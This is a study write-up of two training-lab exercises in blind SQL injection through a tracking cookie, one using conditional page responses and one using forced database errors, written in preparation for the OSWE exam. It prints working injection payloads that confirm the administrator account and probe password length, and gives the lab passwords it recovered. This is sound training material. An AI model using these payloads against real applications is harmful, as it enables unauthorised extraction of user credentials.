This topic is explained in details in OSWE courses, and I assume that it will be tested in the exam.
Lab: Blind SQL injection with conditional responses
Intro
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a “Welcome back” message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Solution
Try with the traditional injection method to select username and password from users table but there is no output. Start the session in burp.
In burp session, it is noticed that the web page contains session id:
1 | Cookie: TrackingId=vQKvLxRCijcrlFoo; session=1kmuR4Flcru129GQHmwUqNTKz12AbG2J |
It can be verified that TrackingId is vulnerable to SQL Injection, because a input like TrackingId=a' or 1=1--
will introduce an welcome back on home page. A blind SQL injection is thus possible through conditional response (if welcome back appears).
We can then manually verify the administrator account exists in target db:
1 | Cookie: TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator'--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo |
After that, we can determine the length of the password for user administrator
1 | Cookie: TrackingId=a'UNION SELECT 'a' from users WHERE username = 'administrator' and length(password)=20--; session=Rict9ulgAu63wgQ3vkcsbQ9vfVUPsGBo |
This proves that password is 20-char long, which means we cannot manually brute-force the password. I develop the following python code to verify the blind SQL Injection vulnerability.
1 | import requests |
The final password is: futqttlev8verb4m7res
Lab: Blind SQL injection with conditional errors
Intro
his lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Solution
This lab is similar to the previous one, where conditional response is replaced by conditional errors. I didn’t know much about conditional error injection and I mostly refer to: SQL_Injection_Cheatsheet
Based on the conditional error injection sentence, I developed the cookie to be:Cookie: TrackingId=' UNION SELECT CASE WHEN (condition) THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
With the same technique, we can identify that user administrator is within users db:Cookie: TrackingId=' UNION SELECT CASE WHEN (username='administrator') THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
Now I can identify the length of the password for administrator user:Cookie: TrackingId=' UNION SELECT CASE WHEN (username='administrator' and length(password)=20) THEN to_char(1/0) ELSE NULL END FROM users --; session=UWYPqfgrRxE3j6ClT4rgWshux4C54VNs
Same as the previous example, the password length is 20. Let’s develop the python script.
1 | import requests |
The final password is: tdosf5caziu4dsh5ry1j
EndNote
In the original online lab solution, it is suggested to use Burp Intruder to conduct the attack. However, OSWE official suggested to use python instead of Burp. To keep this consistency, I use the similar coding style as OSWE official (with ascii(substring)) to prepare for the exam.